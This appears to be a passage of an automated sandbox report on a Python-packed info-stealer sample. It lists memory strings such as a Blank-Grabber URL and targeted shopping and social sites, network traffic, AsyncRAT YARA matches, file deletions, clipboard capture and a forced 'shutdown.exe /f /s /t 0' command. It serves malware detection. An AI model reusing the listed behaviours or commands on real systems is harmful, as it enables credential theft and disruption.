                      Source: sB2ClgrGng.exe, 00000001.00000003.1783370880.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1782846759.00000281ABA90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz
                      Source: sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: sB2ClgrGng.exe, 00000001.00000003.1878461049.00000281AC03E000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1893801082.00000281AC03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
                      Source: sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABFBF000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABFBF000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1843699138.00000281ABFBF000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1892823881.00000281AC9AF000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1824674501.00000281AC0BC000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1823342722.00000281AC033000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281ABFBF000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1827778807.00000281AC0F1000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1843699138.00000281AC033000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                      Source: sB2ClgrGng.exe, 00000001.00000003.1824674501.00000281AC0BC000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1827778807.00000281AC0F1000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1824469466.00000281AC9E4000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
                      Source: sB2ClgrGng.exe, 00000001.00000003.1892823881.00000281AC9AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                      Source: sB2ClgrGng.exe, 00000001.00000003.2164729393.00000281ABF4C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2189355250.00000281ABA70000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164621490.00000281ACBF5000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031411910.00000281ACBF4000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031644864.00000281ABF4C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2184336077.00000281ABA70000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031480408.00000281ABA66000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2029385987.00000281ACBD1000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164533332.00000281ABA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                      Source: sB2ClgrGng.exe, 00000001.00000003.2029385987.00000281ACBAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                      Source: sB2ClgrGng.exe, 00000001.00000003.2164729393.00000281ABF4C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2189355250.00000281ABA70000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164621490.00000281ACBF5000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031411910.00000281ACBF4000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031644864.00000281ABF4C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2184336077.00000281ABA70000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031480408.00000281ABA66000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2029385987.00000281ACBD1000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164533332.00000281ABA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                      Source: sB2ClgrGng.exe, 00000001.00000003.2029385987.00000281ACBAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                      Source: sB2ClgrGng.exe, 00000001.00000002.2189355250.00000281ABA70000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2184336077.00000281ABA70000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031480408.00000281ABA66000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1919277034.00000281ABA74000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1829116745.00000281ABA75000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1810702061.00000281ABA75000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1900869577.00000281ABA75000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1852816239.00000281ABA73000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164533332.00000281ABA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
                      Source: sB2ClgrGng.exe, 00000001.00000003.1784156958.00000281ABEF0000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1784233182.00000281ABA0F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2189091027.00000281ABA0F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1784156958.00000281ABEE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
                      Source: sB2ClgrGng.exe, 00000001.00000002.2188821100.00000281AB619000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                      Source: sB2ClgrGng.exe, 00000001.00000002.2191721671.00000281AC3E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
                      Source: sB2ClgrGng.exe, 00000001.00000002.2191571952.00000281AC220000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
                      Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4C4000.00000004.00001000.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://weibo.com/
                      Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aliexpress.com/
                      Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.ca/
                      Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.co.uk/
                      Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/
                      Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.de/
                      Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.fr/
                      Source: sB2ClgrGng.exe, 00000001.00000002.2191721671.00000281AC3E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.avito.ru/
                      Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/
                      Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.bbc.co.uk/
                      Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ctrip.com/
                      Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.co.uk/
                      Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.de/
                      Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4C4000.00000004.00001000.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                      Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/
                      Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ifeng.com/
                      Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.iqiyi.com/
                      Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.leboncoin.fr/
                      Source: sB2ClgrGng.exe, 00000001.00000003.1878461049.00000281AC03E000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1892823881.00000281AC9A0000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC48C000.00000004.00001000.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2185827911.00000281AC9D1000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2029909133.00000281ACD93000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2191721671.00000281AC330000.00000004.00001000.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABE58000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1893801082.00000281AC03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                      Source: sB2ClgrGng.exe, 00000001.00000003.1824376723.00000281ABADD000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2032780608.00000281ABADD000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1824674501.00000281AC0BC000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1894030317.00000281ABAE4000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1852816239.00000281ABAE4000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031480408.00000281ABA66000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1827778807.00000281AC0F1000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1919277034.00000281ABA74000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1810702061.00000281ABA75000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1900869577.00000281ABA75000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164533332.00000281ABA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                      Source: sB2ClgrGng.exe, 00000001.00000003.1892823881.00000281AC9AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                      Source: sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABFBF000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1843699138.00000281ABFBF000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1824674501.00000281AC0BC000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1823342722.00000281AC033000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1827778807.00000281AC0F1000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1843699138.00000281AC033000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                      Source: sB2ClgrGng.exe, 00000001.00000003.1892823881.00000281AC9AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                      Source: sB2ClgrGng.exe, 00000001.00000003.1824674501.00000281AC0BC000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1827778807.00000281AC0F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                      Source: sB2ClgrGng.exe, 00000001.00000003.1892823881.00000281AC9AF000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1852816239.00000281ABA73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                      Source: sB2ClgrGng.exe, 00000001.00000003.1892823881.00000281AC9AF000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1824674501.00000281AC0BC000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1827778807.00000281AC0F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                      Source: sB2ClgrGng.exe, 00000001.00000003.1813675437.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031644864.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2190334211.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164729393.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1843699138.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2186245012.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1878461049.00000281ABF76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon-196x196.2af054fea211.png
                      Source: sB2ClgrGng.exe, 00000001.00000003.1813675437.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1854259026.00000281AC9EE000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1887470881.00000281AC9EB000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1892823881.00000281AC9EE000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031644864.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1824065198.00000281AC9EE000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2190334211.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164729393.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1897588274.00000281AC9EE000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2189091027.00000281AB920000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872068738.00000281AC9EA000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1843699138.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2186245012.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1878461049.00000281ABF76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
                      Source: sB2ClgrGng.exe, 00000001.00000003.1892823881.00000281AC9AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                      Source: sB2ClgrGng.exe, 00000001.00000003.2165800360.00000281AC9C6000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC53C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
                      Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4C4000.00000004.00001000.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.olx.pl/
                      Source: sB2ClgrGng.exe, 00000000.00000003.1759357269.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2196648212.00007FFDFAEA0000.00000004.00000001.01000000.0000000F.sdmp, sB2ClgrGng.exe, 00000001.00000002.2198959360.00007FFDFF258000.00000004.00000001.01000000.00000010.sdmpString found in binary or memory: https://www.openssl.org/H
                      Source: sB2ClgrGng.exe, sB2ClgrGng.exe, 00000001.00000002.2197225283.00007FFDFB546000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.python.org/psf/license/
                      Source: sB2ClgrGng.exe, 00000001.00000002.2197225283.00007FFDFB442000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.python.org/psf/license/)
                      Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/
                      Source: sB2ClgrGng.exe, 00000001.00000003.1813675437.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031644864.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2190334211.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164729393.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1843699138.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2186245012.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1878461049.00000281ABF76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
                      Source: sB2ClgrGng.exe, 00000001.00000002.2191721671.00000281AC3E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.wykop.pl/
                      Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                      Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.zhihu.com/
                      Source: sB2ClgrGng.exe, 00000001.00000003.1813675437.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031644864.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2190334211.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164729393.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1843699138.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2186245012.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1878461049.00000281ABF76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49738 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: Yara matchFile source: Process Memory Space: sB2ClgrGng.exe PID: 2892, type: MEMORYSTR
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile deleted: C:\Users\user\AppData\Local\Temp\ \Common Files\Desktop\CURQNKVOIX.mp3Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile deleted: C:\Users\user\AppData\Local\Temp\ \Common Files\Desktop\LTKMYBSEYZ.docxJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile deleted: C:\Users\user\AppData\Local\Temp\ \Common Files\Desktop\VAMYDFPUND.pngJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile deleted: C:\Users\user\AppData\Local\Temp\ \Common Files\Desktop\CURQNKVOIX.jpgJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile deleted: C:\Users\user\AppData\Local\Temp\ \Common Files\Desktop\CURQNKVOIX.jpgJump to behavior
                      Source: cmd.exeProcess created: 59

                      System Summary

                      barindex
                      Source: 15.0.bound.exe.2f0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 0000000F.00000000.1789335378.00000000002F2000.00000002.00000001.01000000.00000013.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Users\user\AppData\Roaming\word.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess created: C:\Windows\System32\shutdown.exe shutdown.exe /f /s /t 0
                      Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                      Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                      Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                      Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                      Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                      Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                      Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                      Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                      Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                      Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                      Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                      Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess Stats: CPU usage > 49%
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0B3A70: CreateFileW,CreateFileW,DeviceIoControl,CloseHandle,84_2_00007FF71F0B3A70
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0DB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,84_2_00007FF71F0DB57C
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF6448710000_2_00007FF644871000
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF6448789E00_2_00007FF6448789E0
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF6448969640_2_00007FF644896964
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF644881D540_2_00007FF644881D54
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF64488E5700_2_00007FF64488E570
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF6448835A00_2_00007FF6448835A0
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF64488DEF00_2_00007FF64488DEF0
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF6448997280_2_00007FF644899728
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF644895E7C0_2_00007FF644895E7C
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF644889EA00_2_00007FF644889EA0
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF6448798000_2_00007FF644879800
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF6448817400_2_00007FF644881740
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF644881F600_2_00007FF644881F60
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF6448887940_2_00007FF644888794
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF6448908C80_2_00007FF6448908C8
